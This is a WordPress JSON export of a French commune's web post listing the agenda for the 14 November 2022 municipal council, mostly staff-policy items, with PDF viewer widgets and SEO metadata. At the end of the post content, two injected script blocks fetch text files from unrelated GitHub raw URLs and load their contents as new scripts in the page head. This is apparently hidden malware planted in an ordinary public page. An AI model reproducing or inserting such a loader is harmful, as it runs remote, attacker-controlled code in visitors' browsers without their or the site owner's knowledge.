{"id":602,"date":"2022-11-15T13:41:00","date_gmt":"2022-11-15T12:41:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=602"},"modified":"2024-07-29T06:38:38","modified_gmt":"2024-07-29T04:38:38","slug":"conseil-municipal-du-14-novembre-2022","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/","title":{"rendered":"Conseil Municipal du 14 Novembre 2022"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 2 septembre 2022.<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Informations au Conseil Municipal.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>1. R\u00e8glement int\u00e9rieur des services communaux &#8211; Mise \u00e0 jour.<br>2. Charte d\u2019utilisation des moyens et outils technologiques de l\u2019information et de la communication (MOTIC) des services communaux.<br>3. Temps de travail &#8211; Application des 1607 heures dans les services communaux.<br>4. Modalit\u00e9s d\u2019exercice du travail \u00e0 temps partiel dans les services communaux.<br>5. Modalit\u00e9s des autorisations sp\u00e9ciales d\u2019absence dans les services communaux.<br>6. Modalit\u00e9s d\u2019organisation des astreintes et\/ou permanences dans les services communaux.<br>7. Modalit\u00e9s d\u2019indemnisation horaires des travaux suppl\u00e9mentaires dans les services communaux.<br>8. Instauration du t\u00e9l\u00e9travail dans les services communaux.<br>9. Mise \u00e0 jour du tableau des effectifs au 1er d\u00e9cembre 2022.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2118\"  _slug=\"ordre-du-jour-de-la-seance-du-14-novembre-2022\" data-title=\"ordre-du-jour-de-la-seance-du-14-novembre-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 14 Novembre 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2118 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_14112022.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2115\"  _slug=\"proces-verbal-de-la-seance-du-14-novembre-2022\" data-title=\"proces-verbal-de-la-seance-du-14-novembre-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal de la s\u00e9ance du 14 Novembre 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2115 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces_verbal_cm_14112022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2112\"  _slug=\"reglement-interieur-des-services-communaux-mise-a-jour\" data-title=\"reglement-interieur-des-services-communaux-mise-a-jour\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >R\u00e8glement int\u00e9rieur des services communaux &#8211; Mise \u00e0 jour<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2112 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/reglement_interieur_des_services_communaux-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2109\"  _slug=\"charte-dutilisation-des-motic-des-services-communaux\" data-title=\"charte-dutilisation-des-motic-des-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Charte d\u2019utilisation des MOTIC des services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2109 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/charte_motic-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2106\"  _slug=\"temps-de-travail-application-des-1607-heures-dans-les-services-communaux\" data-title=\"temps-de-travail-application-des-1607-heures-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Temps de travail &#8211; Application des 1607 heures dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2106 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/temps_de_travail_-_1607_heures-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2103\"  _slug=\"modalites-dexercice-du-travail-a-temps-partiel-dans-les-services-communaux\" data-title=\"modalites-dexercice-du-travail-a-temps-partiel-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modalit\u00e9s d\u2019exercice du travail \u00e0 temps partiel dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2103 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/modalites_d_exercice_temps_partiel-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2100\"  _slug=\"modalites-des-autorisations-speciales-dabsence-dans-les-services-communaux\" data-title=\"modalites-des-autorisations-speciales-dabsence-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modalit\u00e9s des autorisations sp\u00e9ciales d\u2019absence dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2100 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/modalites_des_asa-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2097\"  _slug=\"modalites-dorganisation-des-astreintes-et-ou-permanences-dans-les-services-communaux\" data-title=\"modalites-dorganisation-des-astreintes-et-ou-permanences-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modalit\u00e9s d\u2019organisation des astreintes et\/ou permanences dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2097 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/modalites_astreintes_et_permanences-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2094\"  _slug=\"modalites-dindemnisation-horaires-des-travaux-supplementaires-dans-les-services-communaux\" data-title=\"modalites-dindemnisation-horaires-des-travaux-supplementaires-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modalit\u00e9s d\u2019indemnisation horaires des travaux suppl\u00e9mentaires dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2094 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/indemnisations_hc_hs-tamponne_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2091\"  _slug=\"instauration-du-teletravail-dans-les-services-communaux\" data-title=\"instauration-du-teletravail-dans-les-services-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Instauration du t\u00e9l\u00e9travail dans les services communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2091 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/teletravail-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2088\"  _slug=\"mise-a-jour-du-tableau-des-effectifs-au-1er-decembre-2022\" data-title=\"mise-a-jour-du-tableau-des-effectifs-au-1er-decembre-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Mise \u00e0 jour du tableau des effectifs au 1er d\u00e9cembre 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2088 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/mise_a_jour_du_tableau_des_effectifs_au_01_12_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 2 septembre 2022.&nbsp;Informations au Conseil Municipal. RESSOURCES HUMAINES 1. R\u00e8glement int\u00e9rieur des services communaux &#8211; Mise \u00e0 jour.2. Charte d\u2019utilisation des moyens et outils technologiques de l\u2019information et de la communication (MOTIC) des services communaux.3. Temps de travail &#8211; Application des 1607 heures dans les services communaux.4. Modalit\u00e9s d\u2019exercice du travail \u00e0 temps partiel dans les services communaux.5. Modalit\u00e9s des autorisations sp\u00e9ciales d\u2019absence dans les services communaux.6. Modalit\u00e9s d\u2019organisation des astreintes et\/ou permanences dans les services communaux.7. Modalit\u00e9s d\u2019indemnisation horaires des travaux suppl\u00e9mentaires dans les services communaux.8. Instauration du t\u00e9l\u00e9travail dans les services communaux.9. Mise \u00e0 jour du tableau des effectifs au 1er d\u00e9cembre 2022.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-602","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 2 septembre 2022.&nbsp;Informations au Conseil Municipal. RESSOURCES HUMAINES 1. R\u00e8glement int\u00e9rieur des services communaux &#8211; Mise \u00e0 jour.2. Charte d\u2019utilisation des moyens et outils technologiques de l\u2019information et de la communication (MOTIC) des services communaux.3. Temps de travail &#8211; Application des 1607 heures dans les services communaux.4. Modalit\u00e9s d\u2019exercice du travail \u00e0 temps partiel dans les services communaux.5. Modalit\u00e9s des autorisations sp\u00e9ciales d\u2019absence dans les services communaux.6. Modalit\u00e9s d\u2019organisation des astreintes et\/ou permanences dans les services communaux.7. Modalit\u00e9s d\u2019indemnisation horaires des travaux suppl\u00e9mentaires dans les services communaux.8. Instauration du t\u00e9l\u00e9travail dans les services communaux.9. Mise \u00e0 jour du tableau des effectifs au 1er d\u00e9cembre 2022.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2022-11-15T12:41:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 14 Novembre 2022\",\"datePublished\":\"2022-11-15T12:41:00+00:00\",\"dateModified\":\"2024-07-29T04:38:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/\"},\"wordCount\":140,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/\",\"name\":\"Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2022-11-15T12:41:00+00:00\",\"dateModified\":\"2024-07-29T04:38:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/11\\\/15\\\/conseil-municipal-du-14-novembre-2022\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 14 Novembre 2022\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 2 septembre 2022.&nbsp;Informations au Conseil Municipal. RESSOURCES HUMAINES 1. R\u00e8glement int\u00e9rieur des services communaux &#8211; Mise \u00e0 jour.2. Charte d\u2019utilisation des moyens et outils technologiques de l\u2019information et de la communication (MOTIC) des services communaux.3. Temps de travail &#8211; Application des 1607 heures dans les services communaux.4. Modalit\u00e9s d\u2019exercice du travail \u00e0 temps partiel dans les services communaux.5. Modalit\u00e9s des autorisations sp\u00e9ciales d\u2019absence dans les services communaux.6. Modalit\u00e9s d\u2019organisation des astreintes et\/ou permanences dans les services communaux.7. Modalit\u00e9s d\u2019indemnisation horaires des travaux suppl\u00e9mentaires dans les services communaux.8. Instauration du t\u00e9l\u00e9travail dans les services communaux.9. Mise \u00e0 jour du tableau des effectifs au 1er d\u00e9cembre 2022.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2022-11-15T12:41:00+00:00","article_modified_time":"2024-07-29T04:38:38+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 14 Novembre 2022","datePublished":"2022-11-15T12:41:00+00:00","dateModified":"2024-07-29T04:38:38+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/"},"wordCount":140,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/","name":"Conseil Municipal du 14 Novembre 2022 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2022-11-15T12:41:00+00:00","dateModified":"2024-07-29T04:38:38+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/11\/15\/conseil-municipal-du-14-novembre-2022\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 14 Novembre 2022"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune 